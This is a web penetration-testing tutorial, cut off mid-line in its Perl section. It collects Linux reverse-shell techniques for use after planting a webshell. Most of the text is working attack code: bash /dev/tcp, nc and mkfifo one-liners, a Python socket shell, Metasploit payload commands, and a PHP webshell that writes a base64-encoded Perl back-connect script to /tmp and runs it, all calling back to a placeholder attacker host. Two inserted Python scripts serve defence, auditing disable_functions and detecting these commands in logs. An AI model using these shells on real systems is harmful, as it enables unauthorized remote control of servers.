
Reverse Shells in Web Penetration Testing


0x00

Getting an interactive shell back from a webshell is an essential step before privilege escalation.

0x01 Reverse shells on Linux

1. On a few Linux distributions, bash alone is enough to open the reverse connection.

bash -i >& /dev/tcp/x.x.x.x/2333 0>&1

2. Using NetCat

nc ships with most Linux distributions.

nc -e /bin/sh x.x.x.x 2333

However, some Linux builds of nc have the -e option removed for security reasons.

This can be worked around with a pipe.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc x.x.x.x 2333 > /tmp/f

Or:

nc x.x.x.x 2333 | /bin/sh | nc x.x.x.x 2444

Or:

mknod backpipe p && telnet x.x.x.x 2333 0<backpipe | /bin/bash 1>backpipe

3. PHP reverse shell on Linux

<?php
// Resolve a program name to its full path, falling back to the bare name.
function which($pr) {
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}

// Run a command, trying each PHP command-execution function in turn,
// so that the script still works when some of them are disabled.
function execute($cfe) {
    $res = '';
    if ($cfe) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("\n", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = '';
            while (!@feof($f)) {
                $res .= @fread($f, 1024);
            }
            @pclose($f);
        }
    }
    return $res;
}

// Write a base64-encoded payload to a file.
function cf($fname, $text) {
    if ($fp = @fopen($fname, 'w')) {
        @fputs($fp, @base64_decode($text));
        @fclose($fp);
    }
}

$yourip = "x.x.x.x";
$yourport = "2333";
$usedb = array('perl' => 'perl', 'c' => 'c');

// base64-encoded Perl back-connect script
$back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" .
    "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" .
    "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" .
    "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" .
    "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" .
    "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" .
    "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

// Drop the Perl script to /tmp and launch it in the background.
cf('/tmp/.bc', $back_connect);
$res = execute(which('perl') . " /tmp/.bc $yourip $yourport &");
?>
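The webshell above only works because at least one of exec, shell_exec, system, passthru or popen is still callable; its execute() function simply walks that list until one succeeds. From the defender's side, the relevant check is therefore whether php.ini's disable_functions covers the whole chain. The following Python script is an added example (not part of the original post) that parses a php.ini fragment and reports which functions from that chain remain enabled; the two ini fragments are constructed for the example, and the "last uncommented directive wins" handling is an assumption about how the file is applied.

```python
import re

# The command-execution functions the webshell's execute() tries, in order.
# If any one of them is callable, the fallback chain succeeds.
WEBSHELL_EXEC_CHAIN = ("exec", "shell_exec", "system", "passthru", "popen")

# Constructed php.ini fragments: a weak one that disables only two of the five,
# and a hardened one that disables the whole chain (plus proc_open).
WEAK_INI = """
; constructed example - incomplete hardening
disable_functions = exec,system
"""

HARDENED_INI = """
; constructed example - whole chain disabled
disable_functions = "exec,shell_exec,system,passthru,popen,proc_open"
"""


def parse_disable_functions(ini_text: str) -> set:
    """Return the set of functions named by php.ini's disable_functions.

    Comment lines (';' or '#') are skipped. If the directive appears more than
    once, the last uncommented occurrence is used (assumed to be how the file
    is applied). Names are compared case-insensitively.
    """
    disabled = set()
    for line in ini_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in ";#":
            continue
        m = re.match(r"disable_functions\s*=\s*(.*)$", stripped, re.IGNORECASE)
        if m:
            value = m.group(1).strip().strip('"').strip("'")
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled


def remaining_exec_functions(ini_text: str) -> list:
    """Functions from the webshell's fallback chain that are still callable."""
    disabled = parse_disable_functions(ini_text)
    return [f for f in WEBSHELL_EXEC_CHAIN if f not in disabled]


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        left = remaining_exec_functions(ini)
        status = "still reachable via " + ", ".join(left) if left else "chain fully disabled"
        print(f"{label}: {status}")
```

The point of the check is that partial lists give no protection against this kind of webshell: disabling only exec and system, as in the weak fragment, leaves shell_exec, passthru and popen for the fallback to land on.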

MSF can also produce a PHP reverse shell for Linux.

msf > msfpayload php/reverse_php LHOST=x.x.x.x LPORT=2333 R > re.php

msf > use multi/handler

msf exploit(handler) > set PAYLOAD php/reverse_php

msf exploit(handler) > set LHOST x.x.x.x

msf exploit(handler) > set LPORT 2333

msf exploit(handler) > exploit

4. MSF can also produce a JSP reverse shell for Linux.

msfpayload java/jsp_shell_reverse_tcp LHOST=x.x.x.x R > re.jsp

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp

msf exploit(handler) > set LHOST 192.168.10.1

msf exploit(handler) > exploit

5. Python can also open a reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",2333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

This is the one-liner version.

import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("x.x.x.x", 2333))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])

This is the version saved as a .py file.

MSF can also generate a Python reverse payload.

msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=2333

The generated file looks like this:

import base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMC4wLjAuMCcsMjMzMykpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YoNDA5NikKd2hpbGUgbGVuKGQpIT1sOgoJZCs9cy5yZWN2KDQwOTYpCmV4ZWMoZCx7J3MnOnN9KQo='))
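Every variant listed so far, from the bash and nc one-liners in section 1 and 2 to the Python and msfvenom payloads here, leaves a recognisable command line behind when the web server process spawns it, which is what process-execution logging (auditd execve records, an EDR, or a simple exec tracer) picks up. The following Python script is an added example, not part of the original post, of detection rules run over such logs: each rule is a set of regexes that must all match the same command line. The log lines are constructed for the example in a simplified "uid=... cmdline=..." form; a real source would need its own parser, and the rule list is a starting point rather than a complete signature set.

```python
import re

# Detection rules: a rule fires only if every pattern in its list matches the
# same command line. Patterns mirror the reverse-shell variants on this page.
RULES = {
    # bash -i >& /dev/tcp/HOST/PORT 0>&1
    "bash_dev_tcp": [r"/dev/(tcp|udp)/"],
    # nc -e /bin/sh HOST PORT (the -e flag alone is the giveaway)
    "nc_exec_flag": [r"\b(nc|ncat|netcat)\b", r"\s-e\s"],
    # mkfifo/mknod pipe fed into nc or telnet with a shell in the chain
    "fifo_pipe_shell": [r"\b(mkfifo|mknod)\b", r"\b(nc|ncat|netcat|telnet)\b", r"/bin/(ba)?sh\b"],
    # python one-liner: socket + dup2 onto stdin/stdout/stderr + a shell spawn
    "python_socket_dup2": [r"\bimport\s+[\w,\s]*socket", r"\bdup2\(", r"\b(subprocess|pty|os\.exec)"],
    # msfvenom-style stager: exec(base64.b64decode(...))
    "python_b64_exec": [r"\bexec\(\s*base64\.b64decode\("],
}
COMPILED = {name: [re.compile(p, re.IGNORECASE) for p in pats] for name, pats in RULES.items()}

# Constructed sample log: uid 33 is the web server account on Debian-style
# systems; 203.0.113.5 is a documentation address standing in for x.x.x.x.
SAMPLE_LOG = [
    "uid=33 cmdline=bash -i >& /dev/tcp/203.0.113.5/2333 0>&1",
    "uid=33 cmdline=nc -e /bin/sh 203.0.113.5 2333",
    "uid=33 cmdline=rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 203.0.113.5 2333 > /tmp/f",
    "uid=33 cmdline=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"203.0.113.5\",2333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
    "p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "uid=33 cmdline=python -c \"import base64;exec(base64.b64decode('aW1w'))\"",
    "uid=1000 cmdline=nc -zv 10.0.0.1 80",                                   # benign port check
    "uid=1000 cmdline=python -c 'import socket; print(socket.gethostname())'",  # benign
    "uid=33 cmdline=mknod backpipe p && telnet 203.0.113.5 2333 0<backpipe | /bin/bash 1>backpipe",
]


def extract_cmdline(line: str):
    """Pull the command line out of a constructed 'uid=... cmdline=...' record."""
    m = re.search(r"cmdline=(.*)$", line)
    return m.group(1) if m else None


def scan_log(lines) -> list:
    """Return (rule_name, cmdline) for every rule that fires on every line."""
    alerts = []
    for line in lines:
        cmdline = extract_cmdline(line)
        if cmdline is None:
            continue
        for name, patterns in COMPILED.items():
            if all(p.search(cmdline) for p in patterns):
                alerts.append((name, cmdline))
    return alerts


if __name__ == "__main__":
    for name, cmdline in scan_log(SAMPLE_LOG):
        print(f"[{name}] {cmdline}")
```

Requiring all patterns of a rule to match keeps the benign lines quiet: nc -zv has no -e, and importing socket to print a hostname never calls dup2. In practice the uid field carries the stronger signal, since the web server account has little reason to spawn any shell at all; a rule on "uid=33 spawns /bin/sh" would catch even variants that none of these regexes describe.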

6. Perl

perl -e 'use Socket;$i="x.x.x,x
